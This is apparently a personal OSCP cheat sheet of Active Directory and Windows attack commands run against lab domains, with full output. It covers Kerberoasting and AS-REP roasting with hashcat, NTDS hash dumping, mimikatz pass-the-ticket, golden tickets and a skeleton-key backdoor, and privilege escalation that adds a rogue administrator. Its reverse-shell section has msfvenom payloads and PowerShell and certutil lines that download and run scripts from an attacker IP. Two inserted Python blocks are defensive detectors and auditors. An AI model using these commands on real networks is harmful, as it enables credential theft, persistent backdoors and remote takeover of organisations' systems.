WIP...

Here we go...

A collection of commands for AD enumeration and exploitation for OSCP preparation.

User Enumeration

Enumerate users for domain CONTROLLER.local on DC CONTROLLER.local

kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/User.txt 

Ticket harvesting and password brute-forcing

Capture TGTs sent to the KDC every 30 seconds

Rubeus.exe harvest /interval:30
  User                  :  CONTROLLER-1$@CONTROLLER.LOCAL 
  StartTime             :  2/7/2022 11:39:25 AM
  EndTime               :  2/7/2022 9:39:25 PM
  RenewTill             :  2/14/2022 11:39:25 AM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  Base64EncodedTicket   :

doIFhDCCBYCgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZr
...
MTkzOTI1WqgSGxBDT05UUk9MTEVSLkxPQ0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBDT05UUk9MTEVSLkxPQ0FM

Password spraying

Rubeus.exe brute /password:Password1 /noticket

Kerberoasting

Kerberoasting abuses the fact that any authenticated domain user can request a service ticket for any service with a registered SPN, and that ticket can then be cracked offline.

Tools I can use:

  • BloodHound
  • kekeo
  • Invoke-Kerberoast
  • Rubeus
  • Impacket

It really is that simple

> Rubeus.exe kerberoast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts. 
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. 

[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 2

[*] SamAccountName         : SQLService
[*] DistinguishedName      : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local 
[*] ServicePrincipalName   : CONTROLLER-1/SQLService.CONTROLLER.local:30111
[*] PwdLastSet             : 5/25/2020 10:28:26 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.loca 
                             l:30111*$206D1C13CC0B38A9BB6B7673E8BF8CBD$75C2C23607C1DB9C09872722E6915807DD3508 
...
E508230C3992BE14AA1ABED9488232E91B26EE5E57648E2A986D983DD1

[*] SamAccountName         : HTTPService
[*] DistinguishedName      : CN=HTTPService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName   : CONTROLLER-1/HTTPService.CONTROLLER.local:30222
[*] PwdLastSet             : 5/25/2020 10:39:17 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.lo
                             cal:30222*$E704E9062B95E26AAE90DDD17AB00AFA$1EC0CB52D58766E91D142824911B86C72D71...
                             71299289062322C30A52854EA559A45F96CB0DFB1694A6255FFD00A4E4FACD4C1FA7A421BF2371E
                             7ACB0A385170191F06F194D62D8CD6D906A873985B96467F39ABD3DAF6F9

We can also use Impacket from a remote host to get the hashes.

└─$ python2 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.216.129 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

ServicePrincipalName                             Name         MemberOf                                                         PasswordLastSet      LastLogon           
-----------------------------------------------  -----------  ---------------------------------------------------------------  -------------------  -------------------
CONTROLLER-1/SQLService.CONTROLLER.local:30111   SQLService   CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local  2020-05-25 18:28:26  2020-05-25 18:46:42 
CONTROLLER-1/HTTPService.CONTROLLER.local:30222  HTTPService                                                                   2020-05-25 18:39:17  2020-05-25 18:40:14 

$krb5tgs$23$*HTTPService$CONTROLLER.LOCAL$CONTROLLER-1/HTTPService.CONTROLLER.local~30222*$edbe3a2b24df4573d6821395c197c0cd$...
$krb5tgs$23$*SQLService$CONTROLLER.LOCAL$CONTROLLER-1/SQLService.CONTROLLER.local~30111*$7c05198e5d3dbd2432103de303460084$...

Now crack the hash

└─$ hashcat -m 13100 -a 0 http_service.hash Pass.txt                                           
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz, 5836/5900 MB (2048 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 134 MB

Dictionary cache built:
* Filename..: Pass.txt
* Passwords.: 1240
* Bytes.....: 9706
* Keyspace..: 1240
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

$krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.local:30222*$e704e9062b95e26aae90ddd17ab00afa$...:Summer2020

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLE...daf6f9
Time.Started.....: Mon Feb  7 15:34:26 2022 (0 secs)
Time.Estimated...: Mon Feb  7 15:34:26 2022 (0 secs)
Guess.Base.......: File (Pass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   236.6 kH/s (1.28ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1240/1240 (100.00%)
Rejected.........: 0/1240 (0.00%)
Restore.Point....: 0/1240 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> hello123

AS-REP Roasting

Similar to Kerberoasting, AS-REP Roasting dumps the krb5asrep hash of user accounts that have Kerberos pre-authentication disabled. Because it targets the AS-REP rather than a service ticket, those users don't need to be service accounts.

Rubeus.exe asreproast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: AS-REP roasting

[*] Target Domain          : CONTROLLER.local

[*] Searching path 'LDAP://CONTROLLER-1.CONTROLLER.local/DC=CONTROLLER,DC=local' for AS-REP roastable users
[*] SamAccountName         : Admin2
[*] DistinguishedName      : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::e05e:1173:33f7:7c9%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\Admin2'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

      $krb5asrep$Admin2@CONTROLLER.local:3C51D07F1843F12D66E4BBB233C09CE3$795884C015C4
      574540500F23BF6F07D4962505A2DFC15F45E3F9FDE5596024E9C5E92D0B089581817FAFD6B7F479
      3AE38258DDACFBB373D26227229F9F1EC3885855FA5A7C57180C385281A565D6F245CF02E9B48CE9
      2428147580353F9E337F0002F6C7D86FA054F6E5F4FE1022EF897F1CCEE8FB118D7AFCE5D83AB816
      3CC4CC1A66918FC402ECE66233CCDD33FA646FC333248CABC280F9FF83EA0CFBA36FE93681C3B8B8
      5CF8069493053A6216CD5A2EFCD1A60328CA8B5CAE00264FB6D561CDA1535C6BD68B293E5E6FD4C4
      F22708D78352E1DA494134A28F600D9354C97B1DC1341B50344E05D53D1811BB3B9A4A7EA62D

[*] SamAccountName         : User3
[*] DistinguishedName      : CN=User-3,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::e05e:1173:33f7:7c9%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\User3'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

      $krb5asrep$User3@CONTROLLER.local:CA336057CAD77194863CD97401A4B06A$328EC569B6006
      B60093AD9B47EC31AAAAF5725DADFF587AC393521389AEC08A695B92824B9975312931292D58F68C
      C18E1A81B883B0B4CFCE5A68CFF24D7772B183F893CA763A7644D5D26A1475C7EAA2E443CADBE727
      D98B4075A0E44805B55AAF6A23E78821B38F9DB831CF14D636EAD35C0139965A4819A2723C375EA9
      DDBF4ADE7DA54DE4F176F49981938EF496A55F83DEFEEC30B6BB72F70F0720F8E92D8A8A9E0F5D3E
      27306C9D6309AAA8FCA49B1D6ED714FEC746A4AA6EF53DC364C5491405F469DF288FE038AE8EB0E3
      D8BB5A6DB13822F4ACDFC7F65D43F9DE8AFB693CA19CB747AEF92BFDF8451E80826669FFCC3

IMPORTANT: insert 23$ after $krb5asrep$ so that the first line reads $krb5asrep$23$User..... ; hashcat expects this format to crack the hash.

Then crack the hash using hashcat -m 18200 hash.txt Pass.txt

We can achieve the same with Impacket.

python3 impacket/examples/GetNPUsers.py spookysec.local/svc-admin -dc-ip 10.10.253.53 
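The defender's side of the two roasting techniques above, as an added example that is not part of the original notes: Kerberoasting leaves Event ID 4769 entries with TicketEncryptionType 0x17 (RC4, etype 23) for user-account SPNs such as SQLService/HTTPService, and AS-REP roasting leaves Event ID 4768 entries with PreAuthType 0 for the roastable accounts. The event records below are constructed to mirror those fields; the source IPs, timestamps and the 60-second/2-SPN threshold are assumptions.

```python
"""Spot Kerberoasting and AS-REP roasting in Windows Security events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"        # TicketEncryptionType for RC4_HMAC (etype 23, the $krb5tgs$23$ hashes above)
NO_PREAUTH = "0"         # PreAuthType 0 in 4768 = AS-REQ accepted without pre-authentication
WINDOW = timedelta(seconds=60)
MIN_SERVICES = 2         # distinct RC4 user SPNs from one source inside WINDOW (assumed threshold)

SAMPLE_EVENTS = [  # constructed sample data, not real logs
    {"EventID": 4769, "TimeCreated": "2022-02-07 15:30:01", "TargetUserName": "Machine1@CONTROLLER.LOCAL",
     "ServiceName": "SQLService", "TicketEncryptionType": "0x17", "IpAddress": "10.10.216.10"},
    {"EventID": 4769, "TimeCreated": "2022-02-07 15:30:02", "TargetUserName": "Machine1@CONTROLLER.LOCAL",
     "ServiceName": "HTTPService", "TicketEncryptionType": "0x17", "IpAddress": "10.10.216.10"},
    # benign: AES ticket (0x12) for a machine-account service
    {"EventID": 4769, "TimeCreated": "2022-02-07 15:30:05", "TargetUserName": "CONTROLLER-1$@CONTROLLER.LOCAL",
     "ServiceName": "CONTROLLER-1$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.216.129"},
    # benign-ish: a single RC4 ticket from a legacy host stays under the threshold
    {"EventID": 4769, "TimeCreated": "2022-02-07 15:31:00", "TargetUserName": "User2@CONTROLLER.LOCAL",
     "ServiceName": "HTTPService", "TicketEncryptionType": "0x17", "IpAddress": "10.10.216.55"},
    {"EventID": 4768, "TimeCreated": "2022-02-07 15:32:10", "TargetUserName": "Admin2",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "PreAuthType": "0", "IpAddress": "10.10.216.10"},
    {"EventID": 4768, "TimeCreated": "2022-02-07 15:32:11", "TargetUserName": "User1",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "10.10.216.40"},
]


def _ts(ev):
    return datetime.strptime(ev["TimeCreated"], "%Y-%m-%d %H:%M:%S")


def is_roastable_tgs(ev):
    """RC4 service ticket for a non-machine, non-krbtgt service: the Kerberoast signature."""
    svc = ev["ServiceName"]
    return (ev["EventID"] == 4769
            and ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def detect_kerberoast(events, window=WINDOW, min_services=MIN_SERVICES):
    """Return {source_ip: sorted SPNs} for sources that pulled RC4 tickets for
    at least min_services distinct user SPNs within one sliding window."""
    by_src = defaultdict(list)
    for ev in sorted(events, key=_ts):
        if is_roastable_tgs(ev):
            by_src[ev["IpAddress"]].append(ev)
    hits = {}
    for src, evs in by_src.items():
        for i, first in enumerate(evs):
            spns = {e["ServiceName"] for e in evs[i:] if _ts(e) - _ts(first) <= window}
            if len(spns) >= min_services:
                hits[src] = sorted(spns)
                break
    return hits


def detect_asrep_roast(events):
    """Accounts issued a TGT without pre-authentication; exactly the set that
    Rubeus asreproast / GetNPUsers.py can roast, so each one is worth a ticket."""
    return sorted({ev["TargetUserName"] for ev in events
                   if ev["EventID"] == 4768 and ev.get("PreAuthType") == NO_PREAUTH})


if __name__ == "__main__":
    for src, spns in detect_kerberoast(SAMPLE_EVENTS).items():
        print(f"[!] possible Kerberoast from {src}: {', '.join(spns)}")
    for user in detect_asrep_roast(SAMPLE_EVENTS):
        print(f"[!] AS-REP without pre-auth for {user}: enable pre-authentication on the account")
```

Keeping the 0x17 check is what separates roasting from normal traffic; an environment that still has RC4-only service accounts (Supported ETypes: RC4_HMAC_DEFAULT above) should also move those accounts to AES or gMSA.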

Dump password hashes

└─$ python3 impacket/examples/secretsdump.py backup:backup2517860@spookysec.local 
Impacket v0.9.25.dev1+20220331.224942.eb283663 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::

Pass the ticket

For this attack we'll be using Mimikatz, which allows us to dump the TGT from LSASS memory.

controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

If this command does not return Privilege '20' OK, you do not have the administrator privileges needed to run mimikatz properly.

mimikatz # privilege::debug 
Privilege '20' OK 
mimikatz # sekurlsa::tickets /export 

Authentication Id : 0 ; 1202421 (00000000:001258f5) 
Session           : NetworkCleartext from 0
User Name         : Administrator
Domain            : CONTROLLER
Logon Server      : CONTROLLER-1
Logon Time        : 2/8/2022 8:38:42 AM
SID               : S-1-5-21-432953485-3795405108-1502158860-500

         * Username : Administrator
         * Domain   : CONTROLLER.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ? 

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 2/8/2022 8:38:42 AM ; 2/8/2022 6:38:42 PM ; 2/15/2022 8:38:42 AM
           Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL
           Target Name  (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL
           Client Name  (01) : Administrator ; @ CONTROLLER.LOCAL ( CONTROLLER.LOCAL )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             5a88b21f145c0e23bc1a9b3ea3506d987cff9a338de6360de24dc6112a85b49e
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...] 
           * Saved to file [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi !

This will dump all the captured .kirbi tickets to the current directory.

02/08/2022  09:12 AM    <DIR>          .
02/08/2022  09:12 AM    <DIR>          ..
05/25/2020  02:45 PM         1,263,880 mimikatz.exe
05/25/2020  02:14 PM           212,480 Rubeus.exe
02/08/2022  09:12 AM             1,595 [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,787 [0;18e8aa]-1-0-40a50000-CONTROLLER-1$@GC-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,587 [0;27833a]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,755 [0;36502]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,587 [0;3691f]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,791 [0;3e4]-0-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,587 [0;3e4]-2-0-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,755 [0;3e7]-0-0-40a50000-CONTROLLER-1$@HTTP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,787 [0;3e7]-0-1-40a50000-CONTROLLER-1$@GC-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,721 [0;3e7]-0-2-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.kirbi
02/08/2022  09:12 AM             1,711 [0;3e7]-0-3-40a50000.kirbi
02/08/2022  09:12 AM             1,791 [0;3e7]-0-4-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,791 [0;3e7]-0-5-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,721 [0;3e7]-0-6-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.kirbi
02/08/2022  09:12 AM             1,755 [0;3e7]-0-7-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,647 [0;3e7]-1-0-00a50000.kirbi
02/08/2022  09:12 AM             1,587 [0;3e7]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,587 [0;3e7]-2-1-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,755 [0;5646d]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,755 [0;564c9]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,791 [0;56505]-1-0-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,755 [0;5653e]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi

With those we can pass the ticket and impersonate the admin.

mimikatz # kerberos::ptt [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi 

* File: '[0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi': OK

To verify we can use klist

klist

Current LogonId is 0:0x1258f5

Cached Tickets: (1)

#0>     Client: Administrator @ CONTROLLER.LOCAL
        Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/8/2022 8:38:42 (local)
        End Time:   2/8/2022 18:38:42 (local)
        Renew Time: 2/15/2022 8:38:42 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Golden Ticket/Silver Ticket Attacks

For staying undetected, a silver ticket is the better option than a golden ticket: a silver ticket is limited to the service that is targeted, whereas a golden ticket grants access to any Kerberos service.

Dumping the krbtgt

mimikatz # lsadump::lsa /inject /name:krbtgt 
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860 

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 72cd714611b64cd4d5550cd2759db3f6
    LM   :
  Hash NTLM: 72cd714611b64cd4d5550cd2759db3f6 
    ntlm- 0: 72cd714611b64cd4d5550cd2759db3f6
    lm  - 0: aec7e106ddd23b3928f7b530f60df4b6

Creating a golden/silver ticket

Golden Ticket
mimikatz # Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:d01d6ccf97a2ee214ec7185173a3b659 /id:1103

Silver Ticket
mimikatz # Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:d01d6ccf97a2ee214ec7185173a3b659 /id:1103

We can now open an elevated command prompt with misc::cmd

Backdooring Kerberos

We can implant a mimikatz skeleton key and abuse the way the AS-REQ works when RC4 ciphers are used.
The default hash for a mimikatz skeleton key is 60BA4FCADC466C7A033C178194C03DF6, which makes the password "mimikatz".

misc::skeleton

That's it... That's how you backdoor a Microsoft authentication service. I know it's RC4 but still! This is amazing!!!!

Now we can view network shares using
net use \\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz

SMB

Enumerate with nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.232.66

List share files
smbclient //10.10.232.66/anonymous

Recursively download files
smbget -R smb://<ip>/anonymous

Privesc

Unquoted service path

PowerUp.ps1

Download
certutil.exe -urlcache -split -f http://10.8.49.147:1337/PowerUp.ps1 PowerUp.ps1

Load and execute

PS C:\tmp> . .\PowerUp.ps1
PS C:\tmp> Invoke-AllChecks

Windows splits an unquoted service path at every space and tries each prefix with ".exe" appended before it reaches the real binary. Generate a reverse shell named after the first word of the folder that contains the space; for the path
c:\users\admin\my service\bin\start.exe
the file that gets executed first, if it exists, is
c:\users\admin\my.exe

Restart service

net stop servicename
net start servicename
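An audit for the unquoted-path weakness described above, as an added example that is not PowerUp's code: it reproduces the prefix walk Windows performs (appending ".exe" only when a prefix has no extension), lists every file name that would run before the real binary, and emits the sc config line that quotes the path. SERVICES is a constructed sample of name -> ImagePath pairs, the shape you get from HKLM\SYSTEM\CurrentControlSet\Services; the service names and paths are assumptions.

```python
"""Audit service ImagePath values for unquoted paths with spaces (added example)."""
import ntpath

SERVICES = {  # constructed sample data; "my-service" uses the path from the notes above
    "my-service": r"c:\users\admin\my service\bin\start.exe",
    "SyncTool": r"C:\Program Files\Vendor\Sync Tool\sync.exe -run",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "Quoted": r'"C:\Program Files\Vendor\agent.exe" --daemon',
}


def split_exe(image_path):
    """Split an unquoted ImagePath into (executable, arguments) at the first
    space-delimited prefix ending in .exe; whole string is the executable if none does."""
    tokens = image_path.strip().split(" ")
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            return prefix, " ".join(tokens[i:])
    return image_path.strip(), ""


def hijack_candidates(image_path):
    """Paths Windows would try before the real binary, in lookup order.
    Empty for quoted paths and for executables whose path has no spaces."""
    s = image_path.strip()
    if s.startswith('"'):          # a quoted path is passed through unchanged
        return []
    exe, _args = split_exe(s)
    tokens = exe.split(" ")
    cands = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if not ntpath.splitext(prefix)[1]:   # CreateProcess appends .exe only if no extension
            prefix += ".exe"
        cands.append(prefix)
    return cands


def fix_command(name, image_path):
    """sc config line that quotes the executable and keeps its arguments."""
    exe, args = split_exe(image_path)
    binpath = f'\\"{exe}\\"' + (f" {args}" if args else "")
    return f'sc config "{name}" binPath= "{binpath}"'


def audit(services):
    """Return {service: candidate paths} for every service with a hijackable ImagePath."""
    findings = {}
    for name, path in services.items():
        cands = hijack_candidates(path)
        if cands:
            findings[name] = cands
    return findings


if __name__ == "__main__":
    for name, cands in audit(SERVICES).items():
        print(f"[!] {name}: {SERVICES[name]}")
        for c in cands:
            print(f"      would run first if present: {c}")
        print(f"      fix: {fix_command(name, SERVICES[name])}")
```

A candidate only matters if the service account's adversary can write to its directory, so pair the output with an ACL check on each parent folder before prioritising fixes.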

Token impersonation

There are two types of access tokens:

primary access tokens: those associated with a user account, generated on logon
impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process

For an impersonation token, there are different levels:

SecurityAnonymous: current user/client cannot impersonate another user/client
SecurityIdentification: current user/client can get the identity and privileges of a client, but cannot impersonate the client
SecurityImpersonation: current user/client can impersonate the client's security context on the local system
SecurityDelegation: current user/client can impersonate the client's security context on a remote system

where the security context is a data structure that contains the user's relevant security information.
The privileges of an account (which are either given to the account when created or inherited from a group) allow a user to carry out particular actions.
Here are the most commonly abused privileges:

SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege

View privileges
whoami /priv

Impersonation with Invoke-TokenManipulation.ps1

. .\Invoke-TokenManipulation.ps1
PS C:\Program Files (x86)\Jenkins> Invoke-TokenManipulation -Enumerate

Incognito also looks nice

PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe list_tokens -g"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Listing unique users found

PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe add_user xnull password"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user xnull to host 127.0.0.1
[+] Successfully added user
PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe add_localgroup_user Administrators xnull"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user xnull to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group
PS C:\Program Files (x86)\Jenkins> net user xnull
User name                    xnull
Full Name                    xnull
Comment                      
User's comment               
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/14/2022 9:54:21 PM
Password expires             3/28/2022 9:54:21 PM
Password changeable          2/14/2022 9:54:21 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       
Global Group memberships     *None                 
The command completed successfully.

Then RDP into it
rdesktop -u xnull -p password 10.10.175.25

Reverse Shell

Exe using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1338 -f exe -o Advanced.exe
or
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.8.49.147 LPORT=1339 -f exe -o shell.exe

Powershell using PowerShellTcp
powershell iex (New-Object Net.WebClient).DownloadString('http://10.8.49.147:1338/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.8.49.147 -Port 1337

More exploitation

Can we spoof a printer?
PrintSpoofer

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
Last modified: April 3, 2022
